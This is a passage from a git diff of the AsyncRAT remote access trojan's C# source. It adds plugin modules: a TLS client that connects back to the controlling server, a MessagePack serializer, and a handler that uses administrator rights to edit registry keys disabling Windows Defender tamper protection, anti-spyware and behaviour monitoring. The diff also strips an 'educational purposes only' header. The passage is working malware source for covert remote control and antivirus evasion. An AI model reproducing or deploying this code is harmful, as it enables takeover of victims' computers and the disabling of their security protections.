+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient();
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..57a719f
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra.sln b/AsyncRAT-C#/Plugin/Extra/Extra.sln
new file mode 100644
index 0000000..6e7d494
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Extra", "Extra\Extra.csproj", "{424B81BE-2FAC-419F-B4BC-00CCBE38491F}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {4987DF63-DF17-42CF-AB54-BDFDA9768CF0}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs
new file mode 100644
index 0000000..70a0271
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs
@@ -0,0 +1,211 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient(byte[] packet)
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ Packet.Read(packet);
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ GC.Collect();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
new file mode 100644
index 0000000..8dab0b2
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
@@ -0,0 +1,57 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {424B81BE-2FAC-419F-B4BC-00CCBE38491F}
+ Library
+ Properties
+ Plugin
+ Extra
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Handler/HandleDisableDefender.cs
similarity index 89%
rename from AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs
rename to AsyncRAT-C#/Plugin/Extra/Extra/Handler/HandleDisableDefender.cs
index e6c9f27..5d678e2 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Handler/HandleDisableDefender.cs
@@ -1,23 +1,20 @@
-using System;
-using Microsoft.Win32;
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
using System.Diagnostics;
+using System.Linq;
using System.Security.Principal;
-using Client.Helper;
+using System.Text;
-// │ Author : NYAN CAT
-// │ Name : Disable Windows Defender v1.0
-// │ Contact : https://github.com/NYAN-x-CAT
-
-// This program is distributed for educational purposes only.
-
-namespace Client.Handle_Packet
+namespace Plugin.Handler
{
- public class HandleWindowsDefender
+ class HandleDisableDefender
{
- public HandleWindowsDefender()
+ public void Run()
{
- if (!Methods.IsAdmin()) return;
-
+ Debug.WriteLine("Plugin Invoked");
+ if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
+
RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1");
@@ -27,7 +24,7 @@ namespace Client.Handle_Packet
CheckDefender();
}
- private static void RegistryEdit(string regPath, string name, string value)
+ private void RegistryEdit(string regPath, string name, string value)
{
try
{
@@ -45,7 +42,7 @@ namespace Client.Handle_Packet
catch { }
}
- private static void CheckDefender()
+ private void CheckDefender()
{
Process proc = new Process
{
@@ -111,7 +108,7 @@ namespace Client.Handle_Packet
}
}
- private static void RunPS(string args)
+ private void RunPS(string args)
{
Process proc = new Process
{
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
